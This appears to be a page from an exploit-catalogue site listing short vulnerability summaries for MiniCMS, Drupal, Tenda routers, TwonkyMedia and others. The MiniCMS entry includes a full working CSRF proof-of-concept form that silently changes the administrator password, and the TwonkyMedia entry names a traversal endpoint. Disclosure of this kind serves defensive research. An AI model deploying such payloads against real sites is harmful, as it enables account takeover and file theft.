header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

MiniCMS 1.10 CSRF Vulnerability

There is a CSRF vulnerability that can change the administrator account password. After the administrator logged in, open the following page: poc: <html> <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312"> <title>test</title> <body> <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post"> <input type="hidden" name="site_name" value="hack123" /> <input type="hidden" name="site_desc" value="hacktest" /> <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" /> <input type="hidden" name="user_nick" value="hack" /> <input type="hidden" name="user_name" value="admin" /> <input type="hidden" name="user_pass" value="hackpass" /> <input type="hidden" name="comment_code" value="" /> <input type="hidden" name="save" value=" " /> </form> <script> document.forms[0].submit(); </script> </body> </head> </html>

Homematic CCU2 Arbitrary File Write

The Homematic CCU2 is vulnerable to an arbitrary file write vulnerability. This vulnerability allows an attacker to write arbitrary files to the file system of the Homematic CCU2. This vulnerability is due to the lack of authentication when sending requests to the Homematic CCU2 API. An attacker can exploit this vulnerability by sending a specially crafted request to the Homematic CCU2 API.

Drupal Pre Auth SQL Injection

This exploit is a proof of concept for a pre-authentication SQL injection vulnerability in Drupal. It allows an attacker to gain access to a Drupal site without authentication by exploiting a vulnerability in the way Drupal handles session cookies. The exploit works by sending a specially crafted cookie to the server, which contains an SQL injection payload. The payload is then executed by the server, allowing the attacker to gain access to the site.

Open-AuditIT Professional 2.1 – Stored Cross site scripting (XSS)

It was observed that attacker is able to inject a malicious script in the Application. As server is not filtering the inputs provided by an attacker and the script executes in the victim browser when he tries to visit the page.

Tenda N11 Wireless Router V5.07.43_en_NEX01 Cookie Session Weakness Remote DNS Change PoC Exploit

Once modified, systems use foreign DNS servers, which are usually set up by cybercriminals. Users with vulnerable systems or devices who try to access certain sites are instead redirected to possibly malicious sites. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.

Microsoft Windows Remote Assistance XXE

Invitation.msrcincident file contains an XML document with a DOCTYPE declaration that references an external entity. This external entity is used to include the contents of a file from the local system. The xxe.xml file contains an entity that is used to include the contents of the win.ini file from the local system.

TwonkyMedia Server 7.0.11-8.5 Persistent XSS

TwonkyMedia Server 7.0.11-8.5 is vulnerable to persistent XSS. The vulnerability exists in the web UI of the TwonkyMedia Server. An attacker can inject malicious JavaScript code into the web UI of the TwonkyMedia Server. The malicious JavaScript code will be executed in the browser of the user who visits the web UI of the TwonkyMedia Server. The vulnerability can be exploited by sending a specially crafted HTTP request to the TwonkyMedia Server.

TwonkyMedia Server 7.0.11-8.5 Directory Traversal

TwonkyMedia Server 7.0.11-8.5 is vulnerable to directory traversal, which allows an attacker to read arbitrary files on the system with the web server privileges. The vulnerability exists due to insufficient validation of user-supplied input in the "getfile" parameter of the "/rpc/get_file" script. A remote attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. "..%2f") to read arbitrary files on the system with the web server privileges.

Recent Exploits: